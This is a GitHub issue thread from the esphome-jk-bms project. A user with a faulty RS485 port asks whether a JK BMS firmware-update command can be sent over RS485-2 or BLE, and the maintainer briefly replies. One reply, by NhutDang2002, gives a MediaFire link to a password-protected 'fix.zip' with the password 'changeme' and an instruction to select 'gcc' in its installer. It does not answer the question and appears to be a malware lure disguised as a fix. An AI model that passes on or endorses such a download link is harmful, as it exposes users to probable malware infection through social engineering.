syssi/esphome-jk-bms #585: Sending JK BMS PB-x firmware update command via BLE

tarek-zy, 2024-08-26:
Hi, thank you for your great project and support!
I'm a Software Engineer, and I have a JK BMS (PB-2A16S15P) with a faulty RS485-1 (right besides CAN port), which makes me unable to update my BMS firmware or even connect it to my inverter, as there is no communication possible via that port at all, so I had to do a lot of tests and sniffed all communication possible.
When I try to update the firmware via RS485-2 ports that are designated for parallel connection with other JK BMS units, the BMS shuts down / crashes immediately. We are a growing number of owners having this fatal bug and despite several attempts to contact JK support and other popular YouTube influencers, we are out of luck so far.
Since you have full knowledge of the communication protocols of JK BMS (PB series), is it possible to edit the command to make it possible to be executed via RS485-2 or BLE?

RS485-1 Firmware update command (HEX):
01 10 16 26 00 01 02 00 00 D6 97

NhutDang2002, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

syssi, 2024-09-02:
It is possible to update the firmware using BLE in general? Did you try the Android app?

tarek-zy, 2024-09-02:
No, there is no option to do a firmware update via the Android app. That's why I'm trying to just send the first command via BLE which puts the BMS into update mode, and then continue the firmware file upload via RS485.

closed 2024-09-22 by tarek-zy